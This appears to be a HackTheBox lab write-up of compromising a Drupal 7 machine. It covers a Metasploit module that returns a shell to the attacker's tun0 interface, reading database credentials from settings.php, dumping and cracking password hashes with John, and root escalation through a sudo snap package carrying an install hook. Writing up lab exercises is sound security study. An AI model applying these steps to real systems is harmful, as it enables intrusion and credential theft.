![7d7d53d0b5f332b4cbafe6bdcd30c2ee.png](b81d625b23ad4bdda6d49bae5229a860.png) ### Port Scanning and General Enumeration (Nmap) My **allports (-p-)** scan showed 22 and 80 open. Not much. ![b500616c4207aa9cc48e4190ddce65a9.png](c8b2e7e4adac4cf4a51efbe7b9e38c1e.png) Tons of disallows in **robots.txt**, but nothing super interesting. **Drupal** version number though. Is 7 vulnerable to anything? --- ### Access (searchsploit, metasploit, drupal) Let's check **searchsploit** for **Drupal 7** ![32204402cf361d87f0db376a0e51aeb7.png](64fe0432ded3489c8e55265dd8bc5c77.png) Looks like there's a ruby module for metasploit 1. `msfconsole` 2. `search drupal 7` ![a8c54725cf4f15cece3bc602969231b8.png](a28cc04e16084275a82ce29b3f116cdb.png) 3. `use 4` 4. `set lhost tun0` 5. `set rhosts MACHINEIP` Using 4 we get a shell as 'apache' but it's really bad. After some googling for locations, I found the **Drupal config file** located at `/var/www/html/sites/default/settings.php` Database creds in that file! ![7d5d856adb4768adaee4eb2d25085625.png](10024dc310054ba6bef123649755e18b.png) `mysql -u drupaluser -p` Can't get output from mysql, but it's working. 1. `use drupal;` 2. `select name, pass from users;` ![a276807aedcd4404caaeabc316688f4d.png](0aebfe31d5134aa286c178d245e300bb.png) Saved the hash and ran it through John ![975a6d61d816535119c9a3689af43b0c.png](1f431373095e4e5698cfb1d51fd351a5.png) The cracked hash gave us the password for the **brucetherealadmin** account. SSH in and capture the user flag! ![8820ff079e8aac0f31a68576d74c2b64.png](511c5569be534af5ada9ae4055b575eb.png) --- ### Privesc (sudo, snap, fpm, gtfobins) `sudo -l` ![4a316a471c7ac89a3ac67b6b6e65e36b.png](82b556430aa54bea8f3559024507f763.png) gtfobins for snap https://gtfobins.github.io/gtfobins/snap/ Follow the directions and use **fpm** to generate the file we need, however before you upload it, edit the `/meta/hooks/install` file. Mine just cats the flag, but you can use whatever command you want. ``` #!/bin/sh cat /root/root.txt; false ``` ![a5561409fd52d4bb237fbd8c7a5f4a26.png](5828895e7795493ea86ab12096caa8c5.png) Root flag! --- Back to [[HackTheBox Index]] Tags: #htb #metasploit #johntheripper #hashcracking #snap Related: